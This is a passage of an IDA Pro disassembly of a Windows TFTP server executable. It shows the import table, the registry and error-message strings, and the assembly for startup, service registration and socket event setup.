;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : D1599CE1F52069B225BCFB5F3FCB9020
; File Name : u:\work\d1599ce1f52069b225bcfb5f3fcb9020_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 1000000
; Section 1. (virtual address 00001000)
; Virtual size : 00003310 ( 13072.)
; Section size in file : 00003400 ( 13312.)
; Offset to raw data for section: 00000600
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; LSTATUS __stdcall RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult)
extrn RegOpenKeyExA:dword ; CODE XREF: sub_10037BF+20�p
; DATA XREF: sub_10037BF+20�r
; BOOL __stdcall StartServiceCtrlDispatcherA(const SERVICE_TABLE_ENTRYA *lpServiceStartTable)
extrn StartServiceCtrlDispatcherA:dword ; CODE XREF: sub_1001570+DB�p
; DATA XREF: sub_1001570+DB�r
; LSTATUS __stdcall RegQueryValueExA(HKEY hKey, LPCSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
extrn RegQueryValueExA:dword ; CODE XREF: sub_10037BF+64�p
; sub_10037BF+99�p ...
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_10037BF+143�p
; DATA XREF: sub_10037BF+143�r
; SERVICE_STATUS_HANDLE __stdcall RegisterServiceCtrlHandlerA(LPCSTR lpServiceName, LPHANDLER_FUNCTION lpHandlerProc)
extrn RegisterServiceCtrlHandlerA:dword ; CODE XREF: sub_1001665+4A�p
; DATA XREF: sub_1001665+4A�r
; BOOL __stdcall SetServiceStatus(SERVICE_STATUS_HANDLE hServiceStatus, LPSERVICE_STATUS lpServiceStatus)
extrn SetServiceStatus:dword ; CODE XREF: sub_1001665+6A�p
; sub_1001665+F7�p ...
;
; Imports from KERNEL32.dll
;
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_1001570+ED�p
; DATA XREF: sub_1001570+ED�r
; DWORD __stdcall ExpandEnvironmentStringsA(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize)
extrn ExpandEnvironmentStringsA:dword ; CODE XREF: sub_1003910+34�p
; DATA XREF: sub_1003910+34�r
; void __stdcall GetLocalTime(LPSYSTEMTIME lpSystemTime)
extrn GetLocalTime:dword ; CODE XREF: sub_1002A3D+35�p
; DATA XREF: sub_1002A3D+35�r
; void __stdcall DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn DeleteCriticalSection:dword ; CODE XREF: sub_1002901+48�p
; DATA XREF: sub_1002901+48�r
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_10027E1+83�p
; sub_1002F31+1C3�p ...
; BOOL __stdcall SetEvent(HANDLE hEvent)
extrn SetEvent:dword ; CODE XREF: sub_1001E73+36�p
; DATA XREF: sub_1001E73+36�r
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: HandlerProc+38�p
; DATA XREF: HandlerProc+38�r
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_1001570+E5�p
; sub_1001665:loc_1001762�p ...
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_1001665+210�p
; sub_1001A91+1AB�p
; DATA XREF: ...
; HANDLE __stdcall CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName)
extrn CreateEventA:dword ; CODE XREF: sub_1001665+7E�p
; sub_1001665+89�p ...
; void __stdcall InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn InitializeCriticalSection:dword ; CODE XREF: sub_10018DB+12�p
; sub_10018DB+19�p ...
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: sub_10019F0+23�p
; DATA XREF: sub_10019F0+23�r
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection:dword ; CODE XREF: sub_1001A1F+68�p
; sub_1001A91+B5�p ...
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_1001A1F+58�p
; DATA XREF: sub_1001A1F+58�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_1001A1F+49�p
; sub_1001E73+A9�p ...
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection:dword ; CODE XREF: sub_1001A1F+B�p
; sub_1001A91+4E�p ...
; LONG __stdcall InterlockedIncrement(volatile LONG *lpAddend)
extrn InterlockedIncrement:dword ; CODE XREF: sub_1001A91+27C�p
; sub_1001A91+2C1�p
; DATA XREF: ...
; DWORD __stdcall WaitForMultipleObjects(DWORD nCount, const HANDLE *lpHandles, BOOL bWaitAll, DWORD dwMilliseconds)
extrn WaitForMultipleObjects:dword ; CODE XREF: sub_1001A91+158�p
; DATA XREF: sub_1001A91+158�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_1001A91+93�p
; DATA XREF: sub_1001A91+93�r
; BOOL __stdcall ResetEvent(HANDLE hEvent)
extrn ResetEvent:dword ; CODE XREF: sub_1001A91+75�p
; DATA XREF: sub_1001A91+75�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: .text:01001D94�p
; sub_100205A+4E�p
; DATA XREF: ...
; BOOL __stdcall TryEnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn TryEnterCriticalSection:dword ; CODE XREF: .text:01001D89�p
; .text:01001D9B�p
; DATA XREF: ...
; DWORD __stdcall SuspendThread(HANDLE hThread)
extrn SuspendThread:dword ; CODE XREF: HandlerProc+50�p
; sub_100741B+2D�p
; DATA XREF: ...
;
; Imports from MSVCRT.dll
;
extrn __imp__initterm:dword ; DATA XREF: _initterm�r
extrn __getmainargs:dword ; CODE XREF: .text:01003B18�p
; DATA XREF: .text:01003B18�r
extrn __setusermatherr:dword ; CODE XREF: .text:01003AD8�p
; DATA XREF: .text:01003AD8�r
extrn _lseek:dword ; CODE XREF: sub_1002F31+1F0�p
; sub_1002F31+20A�p
; DATA XREF: ...
extrn _close:dword ; CODE XREF: sub_1002953+11�p
; DATA XREF: sub_1002953+11�r
extrn _read:dword ; CODE XREF: sub_10027E1+63�p
; DATA XREF: sub_10027E1+63�r
; void *__cdecl malloc(size_t Size)
extrn malloc:dword ; CODE XREF: sub_1001FA6+30�p
; sub_100205A+93�p ...
; void *__cdecl realloc(void *Memory, size_t NewSize)
extrn realloc:dword ; CODE XREF: sub_1001FA6+55�p
; DATA XREF: sub_1001FA6+55�r
; int __cdecl fclose(FILE *File)
extrn fclose:dword ; CODE XREF: sub_1001E73+CD�p
; DATA XREF: sub_1001E73+CD�r
; void __cdecl free(void *Memory)
extrn free:dword ; CODE XREF: sub_10018DB+75�p
; sub_1001F54+47�p ...
; time_t __cdecl time(time_t *Time)
extrn time:dword ; CODE XREF: sub_1001665+114�p
; HandlerProc+8�p
; DATA XREF: ...
extrn _chdir:dword ; CODE XREF: sub_1001665+19F�p
; sub_1001665+1BE�p
; DATA XREF: ...
; int *__cdecl errno()
extrn _errno:dword ; CODE XREF: sub_1001665+1A7�p
; sub_10027E1+7D�p ...
extrn _mkdir:dword ; CODE XREF: sub_1001665+1AE�p
; DATA XREF: sub_1001665+1AE�r
; FILE *__cdecl fopen(const char *Filename, const char *Mode)
extrn fopen:dword ; CODE XREF: sub_1001665+1DB�p
; DATA XREF: sub_1001665+1DB�r
; char *__cdecl ctime(const time_t *Time)
extrn ctime:dword ; CODE XREF: sub_1001665+1F7�p
; HandlerProc+19�p
; DATA XREF: ...
; unsigned int __cdecl _controlfp(unsigned int NewValue, unsigned int Mask)
extrn __imp__controlfp:dword ; DATA XREF: _controlfp�r
extrn _except_handler3:dword ; DATA XREF: .text:loc_1003BF0�r
extrn __set_app_type:dword ; CODE XREF: .text:01003A7F�p
; DATA XREF: .text:01003A7F�r
extrn __p__fmode:dword ; CODE XREF: .text:01003A9C�p
; DATA XREF: .text:01003A9C�r
extrn __p__commode:dword ; CODE XREF: .text:01003AAA�p
; DATA XREF: .text:01003AAA�r
extrn _adjust_fdiv:dword ; DATA XREF: .text:01003AB8�r
; int printf(const char *Format, ...)
extrn printf:dword ; CODE XREF: sub_1001570+52�p
; sub_1001570+5F�p ...
extrn __p___initenv:dword ; CODE XREF: .text:01003B33�p
; DATA XREF: .text:01003B33�r
extrn __imp__XcptFilter:dword ; DATA XREF: _XcptFilter�r
; void __cdecl exit(int Code)
extrn _exit:dword ; CODE XREF: .text:01003B7A�p
; DATA XREF: .text:01003B7A�r
extrn _open:dword ; CODE XREF: sub_1002F31+1A6�p
; sub_100333A+1B9�p
; DATA XREF: ...
extrn _write:dword ; CODE XREF: sub_100373A+5B�p
; DATA XREF: sub_100373A+5B�r
; void __cdecl exit(int Code)
extrn exit:dword ; CODE XREF: sub_1001570+CF�p
; sub_1001665+C0�p ...
;
; Imports from WS2_32.dll
;
; SOCKET __stdcall WSASocketA(int af, int type, int protocol, LPWSAPROTOCOL_INFOA lpProtocolInfo, GROUP g, DWORD dwFlags)
extrn WSASocketA:dword ; CODE XREF: sub_100205A+17�p
; DATA XREF: sub_100205A+17�r
; int __stdcall WSAGetLastError()
extrn WSAGetLastError:dword ; CODE XREF: sub_1001665+B1�p
; sub_1001A91+12B�p ...
; int __stdcall WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: sub_1001665+A6�p
; DATA XREF: sub_1001665+A6�r
; int __stdcall WSAEventSelect(SOCKET s, HANDLE hEventObject, __int32 lNetworkEvents)
extrn WSAEventSelect:dword ; CODE XREF: sub_100188E+C�p
; DATA XREF: sub_100188E+C�r
; u_short __stdcall htons(u_short hostshort)
extrn htons:dword ; CODE XREF: sub_1001A91+1D2�p
; sub_100230A+18�p ...
; BOOL __stdcall WSAGetOverlappedResult(SOCKET s, LPWSAOVERLAPPED lpOverlapped, LPDWORD lpcbTransfer, BOOL fWait, LPDWORD lpdwFlags)
extrn WSAGetOverlappedResult:dword ; CODE XREF: sub_1001A91+18E�p
; DATA XREF: sub_1001A91+18E�r
; u_short __stdcall ntohs(u_short netshort)
extrn ntohs:dword ; CODE XREF: sub_1001A91+11E�p
; sub_1002A3D+40�p ...
; int __stdcall WSARecvFrom(SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesRecvd, LPDWORD lpFlags, struct sockaddr *lpFrom, LPINT lpFromlen, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine)
extrn WSARecvFrom:dword ; CODE XREF: sub_1001A91+10F�p
; DATA XREF: sub_1001A91+10F�r
; int __stdcall ioctlsocket(SOCKET s, __int32 cmd, u_long *argp)
extrn ioctlsocket:dword ; CODE XREF: sub_1001A91+2A�p
; DATA XREF: sub_1001A91+2A�r
; BOOL __stdcall WSACloseEvent(HANDLE hEvent)
extrn WSACloseEvent:dword ; CODE XREF: sub_1001F54+1C�p
; DATA XREF: sub_1001F54+1C�r
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_1001F54+13�p
; sub_100205A+E7�p ...
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_1002024+4�p
; sub_1002F31+64�p ...
; int __stdcall bind(SOCKET s, const struct sockaddr *name, int namelen)
extrn bind:dword ; CODE XREF: sub_100205A+7A�p
; sub_1002F31+256�p ...
; struct servent *__stdcall getservbyname(const char *name, const char *proto)
extrn getservbyname:dword ; CODE XREF: sub_100205A+37�p
; DATA XREF: sub_100205A+37�r
; SOCKET __stdcall socket(int af, int type, int protocol)
extrn socket:dword ; CODE XREF: sub_1002F31+22E�p
; sub_100333A+1EB�p
; DATA XREF: ...
; int __stdcall sendto(SOCKET s, const char *buf, int len, int flags, const struct sockaddr *to, int tolen)
extrn sendto:dword ; CODE XREF: sub_100230A+B6�p
; sub_1002A3D+65�p ...
;
; Imports from iphlpapi.dll
;
; DWORD __stdcall NotifyAddrChange(PHANDLE Handle, LPOVERLAPPED overlapped)
extrn __imp_NotifyAddrChange:dword ; DATA XREF: NotifyAddrChange�r
; DWORD __stdcall GetIpAddrTable(PMIB_IPADDRTABLE pIpAddrTable, PULONG pdwSize, BOOL bOrder)
extrn __imp_GetIpAddrTable:dword ; DATA XREF: GetIpAddrTable�r
;
; Imports from ntdll.dll
;
; void *__cdecl memmove(void *Dst, const void *Src, size_t Size)
extrn memmove:dword ; CODE XREF: sub_100273D+72�p
; DATA XREF: sub_100273D+72�r
; char *__cdecl strncpy(char *Dest, const char *Source, size_t Count)
extrn strncpy:dword ; CODE XREF: sub_1003910+24�p
; DATA XREF: sub_1003910+24�r
; int __cdecl isupper(int C)
extrn isupper:dword ; CODE XREF: sub_100333A+86�p
; DATA XREF: sub_100333A+86�r
; int __cdecl tolower(int C)
extrn tolower:dword ; CODE XREF: sub_1002F31+88�p
; sub_100333A+95�p
; DATA XREF: ...
extrn RtlUpdateTimer:dword ; CODE XREF: sub_1002A3D+BC�p
; sub_1002B5E+114�p ...
extrn RtlDeleteTimer:dword ; CODE XREF: sub_1002901+27�p
; sub_1002A3D+FD�p ...
; int __cdecl stricmp(const char *Str1, const char *Str2)
extrn _stricmp:dword ; CODE XREF: sub_10023D8+54�p
; sub_10023D8+C6�p ...
; int __cdecl atoi(const char *Str)
extrn atoi:dword ; CODE XREF: sub_10023D8+81�p
; sub_10023D8+F2�p
; DATA XREF: ...
; char *__cdecl itoa(int Val, char *DstBuf, int Radix)
extrn _itoa:dword ; CODE XREF: sub_10023D8:loc_1002597�p
; DATA XREF: sub_10023D8:loc_1002597�r
extrn RtlDeregisterWaitEx:dword ; CODE XREF: sub_1001F54+A�p
; sub_1002901+35�p
; DATA XREF: ...
extrn __imp__chkstk:dword ; DATA XREF: _chkstk�r
extrn RtlCreateTimerQueue:dword ; CODE XREF: sub_10018DB+81�p
; DATA XREF: sub_10018DB+81�r
extrn RtlRegisterWait:dword ; CODE XREF: sub_100188E+40�p
; sub_10018DB+D6�p
; DATA XREF: ...
extrn RtlCreateTimer:dword ; CODE XREF: sub_10018DB+A8�p
; sub_1002F31+34D�p ...
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 100117Ch
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 2 dup(0)
dd 37ECADD7h, 0
dd 4, 110h, 0
dd 4C00h, 0
dd 37ECADD7h, 0
dd 3, 310h, 0
dd 4D10h, 0
dd 37ECADD7h, 0
dd 6, 2 dup(0)
dd 5020h, 0
dd 37ECADD7h, 0
dd 2, 1Ah, 0
db 90h
db 0FEh, 0A7h, 0FFh
aDNtPrivateNetS db 'D:\nt\private\net\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999'
db ' 22:17:18',0Ah,0
; char aOWritableFiles[]
aOWritableFiles db ' o writable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+C4�o
; char aWritable[]
aWritable db 'writable',0 ; DATA XREF: sub_1001570+BF�o
; sub_10037BF+121�o
align 4
; char aOReadableFiles[]
aOReadableFiles db ' o Readable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+B6�o
; char aReadable[]
aReadable db 'readable',0 ; DATA XREF: sub_1001570+B1�o
; sub_10037BF+F1�o
align 4
; char aOValidmastersK[]
aOValidmastersK db ' o ValidMasters keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+A8�o
; char aMasters[]
aMasters db 'masters',0 ; DATA XREF: sub_1001570+A3�o
; sub_10037BF+C1�o
; char aOValidclientsK[]
aOValidclientsK db ' o ValidClients keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+9A�o
; char aClients[]
aClients db 'clients',0 ; DATA XREF: sub_1001570+95�o
; sub_10037BF+8E�o
; char aTheseKeysAreSh[]
aTheseKeysAreSh db 'These keys are shell patterns with * and ? (see examples above):',0Ah
; DATA XREF: sub_1001570+8D�o
db 0
align 4
; char aOStartdirector[]
aOStartdirector db ' o StartDirectory keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+84�o
; char ValueName[]
ValueName db 'directory',0 ; DATA XREF: sub_1001570+7F�o
; sub_10037BF+5C�o
align 4
; char aRegistryKeyNam[]
aRegistryKeyNam db 'Registry key names, all strings: HKEY_LOCAL_MACHINE %s',0Ah,0
; DATA XREF: sub_1001570+76�o
; char SubKey[]
SubKey db 'System\CurrentControlSet\Services\tftpd\parameters',0
; DATA XREF: sub_1001570+71�o
; sub_10037BF+13�o
align 10h
; char aTftpd_logfileI[]
aTftpd_logfileI db ' TFTPD_LOGFILE is %s',0Ah ; DATA XREF: sub_1001570+68�o
db 0Ah,0
align 4
; char Filename[]
Filename db 'tftpd.log',0 ; DATA XREF: sub_1001570+63�o
; sub_1001665+1D6�o
align 4
; char aTftpd_default_[]
aTftpd_default_ db ' TFTPD_DEFAULT_DIR is %s',0Ah,0 ; DATA XREF: sub_1001570+5A�o
align 4
; char Source[]
Source db '\tftpdroot\',0 ; DATA XREF: sub_1001570+55�o
; sub_1003910+1E�o
a? db '-?',0 ; DATA XREF: sub_1001570+10�o
align 4
; char Mode[]
Mode db 'a+',0 ; DATA XREF: sub_1001665+1D1�o
align 4
; char name[]
name db 'tftp',0 ; DATA XREF: sub_100205A+31�o
align 10h
; char proto[]
proto db 'udp',0 ; DATA XREF: sub_100205A+2C�o
aOptionNegotiat db 'Option negotiation failure',0 ; DATA XREF: .data:01005CE0�o
align 10h
aNoSuchUser db 'No such user',0 ; DATA XREF: .data:01005CDC�o
align 10h
aFileAlreadyExi db 'File already exists',0 ; DATA XREF: .data:01005CD8�o
aUnknownTransfe db 'Unknown transfer ID',0 ; DATA XREF: .data:01005CD4�o
aIllegalTftpOpe db 'Illegal TFTP operation',0 ; DATA XREF: .data:01005CD0�o
align 10h
aDiskFullOrAllo db 'Disk full or allocation exceeded',0 ; DATA XREF: .data:01005CCC�o
align 4
aAccessViolatio db 'Access violation',0 ; DATA XREF: .data:01005CC8�o
align 4
aFileNotFound db 'File not found',0 ; DATA XREF: .data:01005CC4�o
align 4
aErrorUndefined db 'Error undefined',0 ; DATA XREF: .data:off_1005CC0�o
; char aTsize[]
aTsize db 'tsize',0 ; DATA XREF: sub_10023D8:loc_100251A�o
align 10h
; char aTimeout_0[]
aTimeout_0 db 'timeout',0 ; DATA XREF: sub_10023D8:loc_1002498�o
; char Str2[]
Str2 db 'blksize',0 ; DATA XREF: sub_10023D8+4E�o
aTimeout db 'Timeout',0 ; DATA XREF: sub_1002A3D+D2�o
aInsufficientRe db 'Insufficient resources',0 ; DATA XREF: sub_1002F31:loc_1003197�o
; sub_100333A+201�o ...
align 10h
aFileNameTooLon db 'File name too long',0 ; DATA XREF: sub_1002F31+195�o
; sub_100333A+1A0�o
align 4
aMalformedFileN db 'Malformed file name',0 ; DATA XREF: sub_1002F31+139�o
; sub_100333A+159�o
aOctet db 'octet',0 ; DATA XREF: sub_1002F31+D2�o
; sub_100333A:loc_100341F�o
align 10h
aNetascii db 'netascii',0 ; DATA XREF: sub_1002F31+9F�o
; sub_100333A:loc_10033E1�o
align 4
asc_100155C: ; DATA XREF: sub_1003910+7F�o
unicode 0, <\>,0
dword_1001560 dd 0FFFFFFFFh, 1003B5Eh, 1003B73h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_1001570 proc near ; CODE XREF: .text:01003B4A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 1
push esi
jle loc_1001646
mov eax, [esp+4+arg_4]
mov esi, offset a? ; "-?"
mov eax, [eax+4]
loc_1001588: ; CODE XREF: sub_1001570+34�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_10015AA
test cl, cl
jz short loc_10015A6
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_10015AA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_1001588
loc_10015A6: ; CODE XREF: sub_1001570+22�j
xor eax, eax
jmp short loc_10015AF
; ---------------------------------------------------------------------------
loc_10015AA: ; CODE XREF: sub_1001570+1E�j
; sub_1001570+2C�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_10015AF: ; CODE XREF: sub_1001570+38�j
test eax, eax
jnz loc_1001646
mov esi, ds:printf
push offset Format ; " ======================================"...
call esi ; printf
pop ecx
push offset Source ; "\\tftpdroot\\"
push offset aTftpd_default_ ; " TFTPD_DEFAULT_DIR is %s\n"
call esi ; printf
pop ecx
pop ecx
push offset Filename ; "tftpd.log"
push offset aTftpd_logfileI ; " TFTPD_LOGFILE is %s\n\n"
call esi ; printf
pop ecx
pop ecx
push offset SubKey ; "System\\CurrentControlSet\\Services\\tftpd"...
push offset aRegistryKeyNam ; "Registry key names, all strings: HKEY_L"...
call esi ; printf
pop ecx
pop ecx
push offset ValueName ; "directory"
push offset aOStartdirector ; " o StartDirectory keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push offset aTheseKeysAreSh ; "These keys are shell patterns with * an"...
call esi ; printf
pop ecx
push offset aClients ; "clients"
push offset aOValidclientsK ; " o ValidClients keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push offset aMasters ; "masters"
push offset aOValidmastersK ; " o ValidMasters keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push offset aReadable ; "readable"
push offset aOReadableFiles ; " o Readable files keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push offset aWritable ; "writable"
push offset aOWritableFiles ; " o writable files keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push 0FFFFFFFFh ; Code
call ds:exit ; exit
; ---------------------------------------------------------------------------
pop ecx
loc_1001646: ; CODE XREF: sub_1001570+6�j
; sub_1001570+41�j
push offset ServiceStartTable ; lpServiceStartTable
call ds:StartServiceCtrlDispatcherA ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_100165B
call ds:GetLastError
loc_100165B: ; CODE XREF: sub_1001570+E3�j
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
sub_1001570 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_1001665 proc near ; DATA XREF: .data:ServiceStartTable�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
push edi
xor ebp, ebp
push offset HandlerProc ; lpHandlerProc
push offset ServiceName ; "Tftpd"
mov ServiceStatus.dwServiceType, 30h
mov ServiceStatus.dwCurrentState, 2
mov ServiceStatus.dwControlsAccepted, ebp
mov ServiceStatus.dwCheckPoint, 1
mov ServiceStatus.dwWaitHint, 4E20h
mov ServiceStatus.dwWin32ExitCode, ebp
mov ServiceStatus.dwServiceSpecificExitCode, ebp
call ds:RegisterServiceCtrlHandlerA ; RegisterServiceCtrlHandlerA
cmp eax, ebp
mov hServiceStatus, eax
jz loc_1001762
mov esi, ds:SetServiceStatus
mov edi, offset ServiceStatus
push edi ; lpServiceStatus
push eax ; hServiceStatus
call esi ; SetServiceStatus
cmp eax, ebp
jz loc_1001762
mov ebx, ds:CreateEventA
push ebp ; lpName
push ebp ; bInitialState
push ebp ; bManualReset
push ebp ; lpEventAttributes
call ebx ; CreateEventA
push ebp ; lpName
push ebp ; bInitialState
push ebp ; bManualReset
push ebp ; lpEventAttributes
mov hHandle, eax
call ebx ; CreateEventA
cmp hHandle, ebp
mov hObject, eax
jz short loc_100171C
cmp eax, ebp
jz short loc_100171C
push offset stru_1006140 ; lpWSAData
push 101h ; wVersionRequested
call ds:WSAStartup ; WSAStartup
cmp eax, 0FFFFFFFFh
jnz short loc_1001735
call ds:WSAGetLastError ; WSAGetLastError
loc_100171C: ; CODE XREF: sub_1001665+96�j
; sub_1001665+9A�j ...
push 1Fh
call sub_1001E73
push 1 ; Code
call ds:exit ; exit
; ---------------------------------------------------------------------------
pop ecx
loc_100172C: ; CODE XREF: sub_1001665+218�j
; sub_1001665+224�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_1001735: ; CODE XREF: sub_1001665+AF�j
push edi ; lpServiceStatus
mov ServiceStatus.dwCurrentState, 4
push hServiceStatus ; hServiceStatus
mov ServiceStatus.dwControlsAccepted, 7
mov ServiceStatus.dwCheckPoint, ebp
mov ServiceStatus.dwWaitHint, ebp
call esi ; SetServiceStatus
cmp eax, ebp
jnz short loc_100176A
loc_1001762: ; CODE XREF: sub_1001665+57�j
; sub_1001665+6E�j
call ds:GetLastError
jmp short loc_100171C
; ---------------------------------------------------------------------------
loc_100176A: ; CODE XREF: sub_1001665+FB�j
push 9
pop ecx
xor eax, eax
mov edx, offset Time
mov edi, edx
rep stosd
push edx ; Time
call ds:time ; time
pop ecx
mov edx, [esp+10h+arg_0]
dec edx
mov ebx, (offset dword_1005E07+1)
jz short loc_10017F3
mov eax, [esp+10h+arg_4]
lea eax, [eax+edx*4]
mov [esp+10h+arg_0], eax
loc_1001797: ; CODE XREF: sub_1001665+18C�j
mov eax, [esp+10h+arg_0]
mov eax, [eax]
cmp byte ptr [eax], 2Dh
jnz short loc_10017F3
movsx ecx, byte ptr [eax+1]
sub ecx, 64h
jz short loc_10017C9
dec ecx
jz short loc_10017BD
dec ecx
jnz short loc_10017E9
mov dword_1005DD8, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017BD: ; CODE XREF: sub_1001665+147�j
mov dword_1005DD4, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017C9: ; CODE XREF: sub_1001665+144�j
lea edi, [eax+2]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_10017E9: ; CODE XREF: sub_1001665+14A�j
; sub_1001665+156�j ...
sub [esp+10h+arg_0], 4
dec edx
cmp edx, ebp
ja short loc_1001797
loc_10017F3: ; CODE XREF: sub_1001665+125�j
; sub_1001665+13B�j
call sub_10037BF
call sub_1003910
mov esi, ds:_chdir
push ebx
call esi ; _chdir
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_100182E
call ds:_errno ; _errno
push ebx
call ds:_mkdir ; _mkdir
cmp eax, ebp
pop ecx
jnz loc_100171C
push ebx
call esi ; _chdir
cmp eax, ebp
pop ecx
jnz loc_100171C
loc_100182E: ; CODE XREF: sub_1001665+1A5�j
cmp dword_1005DD8, ebp
jz short loc_1001857
push offset Mode ; "a+"
push offset Filename ; "tftpd.log"
call ds:fopen ; fopen
pop ecx
cmp eax, ebp
pop ecx
mov File, eax
jnz short loc_1001857
mov dword_1005DD8, ebp
loc_1001857: ; CODE XREF: sub_1001665+1CF�j
; sub_1001665+1EA�j
push offset Time ; Time
call ds:ctime ; ctime
pop ecx
call sub_10018DB
call sub_10019F0
push 0FFFFFFFFh ; dwMilliseconds
push hHandle ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
cmp eax, ebp
jz loc_100172C
call ds:GetLastError
jmp loc_100172C
sub_1001665 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100188E(SOCKET s, HANDLE hEventObject, char)
sub_100188E proc near ; CODE XREF: sub_100205A+D5�p
; sub_1002F31+2A8�p ...
var_4 = dword ptr -4
s = dword ptr 8
hEventObject = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push 3 ; lNetworkEvents
push [ebp+hEventObject] ; hEventObject
push [ebp+s] ; s
call ds:WSAEventSelect ; WSAEventSelect
test eax, eax
jz short loc_10018AE
call ds:GetLastError
xor eax, eax
jmp short locret_10018D7
; ---------------------------------------------------------------------------
loc_10018AE: ; CODE XREF: sub_100188E+14�j
test [ebp+arg_8], 1
push 0
push 0FFFFFFFFh
push [ebp+s]
jz short loc_10018C2
push offset loc_1001D74
jmp short loc_10018C7
; ---------------------------------------------------------------------------
loc_10018C2: ; CODE XREF: sub_100188E+2B�j
push offset loc_1001DDB
loc_10018C7: ; CODE XREF: sub_100188E+32�j
push [ebp+hEventObject]
lea eax, [ebp+var_4]
push eax
call ds:RtlRegisterWait ; RtlRegisterWait
mov eax, [ebp+var_4]
locret_10018D7: ; CODE XREF: sub_100188E+1E�j
leave
retn 0Ch
sub_100188E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
